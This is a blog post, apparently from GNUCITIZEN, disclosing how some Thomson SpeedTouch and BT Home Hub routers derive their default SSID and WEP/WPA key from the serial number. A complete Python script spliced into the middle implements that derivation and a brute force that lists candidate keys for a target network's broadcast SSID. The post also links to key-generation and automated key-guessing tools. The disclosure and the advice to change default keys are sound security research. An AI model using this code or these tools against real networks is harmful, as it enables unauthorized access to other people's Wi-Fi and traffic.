Default key algorithm in Thomson and BT Home Hub routers

http://www.gnucitizen.org/blog/default-key-algorithm-in-thomson-and-bt-home-hub-routers/
Yes, we're back with more embedded-device vulnerability research! And yes, we're also back with more security attacks against the BT Home Hub (the most popular DSL router in the UK)!

As you know, we encourage folks in the community to team up with GNUCITIZEN on different projects, as we've had very successful experiences doing so. This time it was Kevin Devine's turn. Kevin, who is an independent senior security researcher, did an awesome job of reverse engineering the *default WEP/WPA key algorithm* used by some Thomson Speedtouch routers, including the BT Home Hub. Kevin noticed that all the public vulnerability research conducted in the past on the BT Home Hub had been released [1] by GNUCITIZEN, so he decided to share his findings and work with us on this fascinating project. As you might already know, at GNUCITIZEN we're committed members of the white-hat community who feel that it's our responsibility to inform the public when a security issue exists.
* Confirmed suspicions *
Many of us who research the security of wireless home routers have long suspected that routers shipping with default WEP/WPA keys generate them with predictable algorithms, for practical reasons. I'm talking about routers that come with those stickers [2] listing the S/N, default SSID and default WEP/WPA key. Chances are that if you own a wireless router which uses a default WEP or WPA key, that key can be predicted from publicly observable information such as the router's MAC address or SSID, both of which are broadcast to anyone within radio range. In other words: it's quite likely that the bad guys can break into your network if you're using the default encryption key. Thanks to Kevin, our suspicion that this issue exists on the BT Home Hub has been confirmed (keep reading for more details!). Our advice is: *use WPA rather than WEP and change the default encryption key now!*

* Brief history of default WEP/WPA key algorithms research *
As far as I know, Kevin and james67 were the first researchers to publicly crack a default encryption key algorithm of a Wi-Fi home router. Kevin cracked [3] the algorithm used by Netopia routers, which are shipped by Eircom in Ireland and AT&T in the US (the second ISP was never reported, 0day!). james67 [4], on the other hand, targeted [5] the Netgear DG834GT router shipped by SKY in the UK. Unfortunately, james67 did not [6] publish the details of the algorithm he cracked, which is a shame as it means that we cannot learn from his research.
* The Thomson Speedtouch default WEP/WPA algorithm *
Unlike james67, Kevin's strategy for cracking default WEP/WPA algorithms involves debugging the setup wizards shipped by some ISPs, rather than debugging the router that implements the default key algorithm. Kevin obtained a copy of one such wizard ("stInstall.exe") provided by Orange in Spain, which can be found on broadband customers' installation CDs. Reversing this setup utility allowed him to figure out the default key algorithm.
In short we have:
S/N -> hash -> default SSID and encryption key
which can be read as: *a hash of the router's serial number is computed, and both the default SSID and the default encryption key are sliced out of that hash.* This is just a high-level overview of the algorithm. The serial number printed on the sticker has the shape CP + four digits + a two-letter PP field + a three-character XXX field + a bracketed CC checksum. PP and CC are discarded; the XXX field is hex-encoded, meaning the ASCII code of each of its three characters is written as two hex digits ("109" -> 313039); and the resulting string is hashed with SHA-1. More specifically we have (quoted from the source code comments of Kevin's stkeys tool):

    Take as example: "CP0615JT109 (53)"
    Remove the CC and PP values: CP0615109
    Convert the "XXX" values to hexadecimal: CP0615313039
    Process with SHA-1: 742da831d2b657fa53d347301ec610e1ebf8a3d0
    The last 3 bytes are converted to a 6-character string and appended to the word "SpeedTouch", which becomes the default SSID: SpeedTouchF8A3D0
    The first 5 bytes are converted to a 10-character string which becomes the default WEP/WPA key: 742DA831D2
In the case of the BT Home Hub, the only difference is that only the last two bytes (rather than three) of the SHA-1 hash are used to derive the SSID:

    S/N: CP0647EH6DM(BF)
    Remove CC and PP values: CP06476DM
    "XXX" values hex-encoded: CP064736444D
    SHA1-ed: 06f48a28eba1ab896a396077d772fd65503b8df3
    Default SSID: BTHomeHub-8DF3
    Default encryption key: 06f48a28eb
By brute-forcing possible serial numbers and deriving the default SSID and encryption key for each one, we can list the candidate keys for a given default SSID, which is exactly what Kevin's stkeys [7] tool does: every serial whose derived SSID matches the target contributes its first five hash bytes as one candidate key.

The more hexadecimal digits the target SSID has, the fewer candidate keys survive, because the SSID suffix acts as a filter on the hash output. For instance, if the target SSID is "SpeedTouchF8A3D0" (24 bits of the hash), we can narrow the number of possible keys down to only two. On the other hand, a target SSID with only 4 hex digits (2 bytes), such as "BTHomeHub-20E3", gives us about 80 possible keys on average.
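The derivation and the SSID-constrained brute force described above, as an added Python example (this is not Kevin Devine's stkeys nor the BTHHkeygen tool from the post). The serial layout, hash slices and SSID prefixes follow the post; the alphabet of the XXX field (digits plus A-Z) and the range of four-digit production fields searched are assumptions. Keys are returned in upper case as in the post's SpeedTouch example: for a 40-bit hex WEP key the case is irrelevant, while a WPA passphrase must be tried exactly as printed on the sticker.

```python
"""Thomson SpeedTouch / BT Home Hub default SSID and key derivation,
reimplemented from the algorithm description in the post.  Added example:
this is neither Kevin Devine's stkeys nor Adrian Pastor's BTHHkeygen."""
import hashlib
from itertools import product
from string import ascii_uppercase, digits

# Alphabet of the three-character XXX unit-number field.  The post's examples
# show digits and upper-case letters ("109", "6DM"); the full alphabet is an
# assumption made here.
UNIT_ALPHABET = digits + ascii_uppercase

# SSID prefix and number of trailing SHA-1 bytes that form the SSID suffix.
PROFILES = {
    "SpeedTouch": ("SpeedTouch", 3),   # e.g. SpeedTouchF8A3D0
    "BTHomeHub": ("BTHomeHub-", 2),    # e.g. BTHomeHub-8DF3
}


def hash_input(serial: str) -> str:
    """Turn a sticker serial such as 'CP0615JT109 (53)' into the string that
    gets hashed: drop the two-letter PP field and the bracketed CC checksum,
    then hex-encode the ASCII bytes of XXX ('109' -> '313039')."""
    body = serial.replace(" ", "").split("(")[0]
    if len(body) != 11 or not body.startswith("CP"):
        raise ValueError(f"unexpected serial format: {serial!r}")
    four_digits, unit = body[2:6], body[8:11]   # body[6:8] is PP, discarded
    return "CP" + four_digits + unit.encode("ascii").hex().upper()


def derive(serial: str, profile: str) -> tuple[str, str]:
    """Return (default SSID, default WEP/WPA key) for a serial number."""
    prefix, suffix_bytes = PROFILES[profile]
    digest = hashlib.sha1(hash_input(serial).encode("ascii")).digest()
    ssid = prefix + digest[-suffix_bytes:].hex().upper()
    key = digest[:5].hex().upper()      # first 5 bytes = 10 hex digits = 40 bits
    return ssid, key


def candidate_keys(target_ssid: str, profile: str, four_digit_fields) -> list:
    """Brute-force every serial over the given four-digit fields and the full
    XXX alphabet, keeping the distinct keys of serials whose derived SSID
    equals target_ssid.  four_digit_fields is an iterable of the 4-digit
    strings that follow "CP" on the sticker, e.g. ["0615"]."""
    prefix, suffix_bytes = PROFILES[profile]
    if not target_ssid.upper().startswith(prefix.upper()):
        raise ValueError(f"{target_ssid!r} does not match profile {profile!r}")
    want = target_ssid[len(prefix):].upper()
    keys = set()
    for field in four_digit_fields:
        for unit in product(UNIT_ALPHABET, repeat=3):
            data = "CP" + field + "".join(unit).encode("ascii").hex().upper()
            digest = hashlib.sha1(data.encode("ascii")).digest()
            if digest[-suffix_bytes:].hex().upper() == want:
                keys.add(digest[:5].hex().upper())
    return sorted(keys)


if __name__ == "__main__":
    for serial, profile in (("CP0615JT109 (53)", "SpeedTouch"),
                            ("CP0647EH6DM(BF)", "BTHomeHub")):
        ssid, key = derive(serial, profile)
        print(f"{serial:18} -> SSID {ssid:18} key {key}")
    # One four-digit field is 36**3 = 46656 SHA-1 computations; the ~80
    # candidates the post quotes for a Home Hub SSID come from sweeping many
    # fields, which is why BTHHkeygen precomputes an SSID->keys table instead.
    ssid, key = derive("CP0647EH6DM(BF)", "BTHomeHub")
    print(ssid, candidate_keys(ssid, "BTHomeHub", ["0647"]))
```

Searching a single four-digit field takes a fraction of a second in pure Python; a full sweep of several years' worth of fields is tens of millions of SHA-1 computations, which is the cost the precomputed table in the post trades away for disk space.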
We've tested the ST585v6, which is shipped by Orange in Spain. Thomson Speedtouch routers provided by Orange in Spain come with WPA enabled by default. Being able to *narrow down the number of possible default WPA keys to only two* using Kevin's tool is quite remarkable.
In the case of the BT Home Hub in the UK (which, by the way, only comes with 40-bit WEP encryption by default), we can narrow down the number of possible keys to about 80. In order to avoid the brute-forcing computation time required by the "stkeys" tool, I created "BTHHkeygen", which looks up the possible keys for a given SSID in a pre-generated "SSID->keys" table. Think of it as a rainbow table for cracking the BT Home Hub's default WEP encryption key. Once the list of around 80 keys is obtained, the second step in the attack is to try each of them automatically until the valid key is identified. For this purpose I created "BTHHkeybf", which is a fancy wrapper around the "iwconfig" Linux tool. We tested three different BT Home Hubs, and the attack seems to work fine.

_The BT Home Hub v1.5 model uses a different algorithm which we have not attempted to crack yet._

There is one thing that I want to mention regarding this attack when launched against a BT Home Hub: breaking into a BT Home Hub Wi-Fi network which uses default settings (40-bit WEP) has always been possible in a matter of minutes (if packet injection attacks are used) since the Home Hub was released onto the market. Therefore, this predictable-default-key attack doesn't change the current state of the BT Home Hub's Wi-Fi insecurity. It's always been known that BT Home Hub Wi-Fi networks can be easily broken into by cracking the WEP key! [8]
* PoC *
BTHHkeygen (including the rainbow tables) and BTHHkeybf can be found here: http://conference.hitb.org/hitbsecconf2008dubai/materials/D2T1%20-%20Adrian%20Pastor%20-%20Cracking%20Into%20Embeded%20Devices%20and%20Beyond.zip (located in the "\BT Home Hub\demo_exploits\Default WEP key cracking\" folder of the archive)
* About GNUCITIZEN *
GNUCITIZEN is a cutting-edge ethical hacker outfit and information think tank which primarily deals with all aspects of the art of hacking. Our work has been featured in established magazines and information portals such as Wired, eWeek, The Register, PC Week, IDG, the BBC and many others. The members of the GNUCITIZEN group are well-known and well-established experts in the information security and black public relations (PR) industries and in hacker circles, with widely recognised experience in the government and corporate sectors and the open source community.
* References *
[1] http://www.google.co.uk/search?q=site:gnucitizen.org+bt+home+hub&num=100&hl=en&filter=0
[2] http://www.belkin.com/support/dl/assets/uk-labels/bthomehub2.jpg
[3] http://h1.ripway.com/kevindevine/wep_key.html
[4] http://www.skyuser.co.uk/forum/blogs/james67/
[5] http://www.skyuser.co.uk/forum/sky-broadband-help/20295-breaking-terms-conditions-your-views-welcome-2.html#post128738
[6] http://www.theregister.co.uk/2008/02/21/sky_broadband_wi_fi_keys_unpicked/
[7] http://weiss.u40.hosting.digiweb.ie/stech/stkeys.zip
[8] http://www.hackernotcracker.com/2007-06/using-aircrack-ngaireplay-ng-under-injection-monitor-mode-in-windows.html

-- 
Adrian 'pagvac' Pastor | Security Consultant and White Hat Hacker | GNUCITIZEN
gnucitizen.com
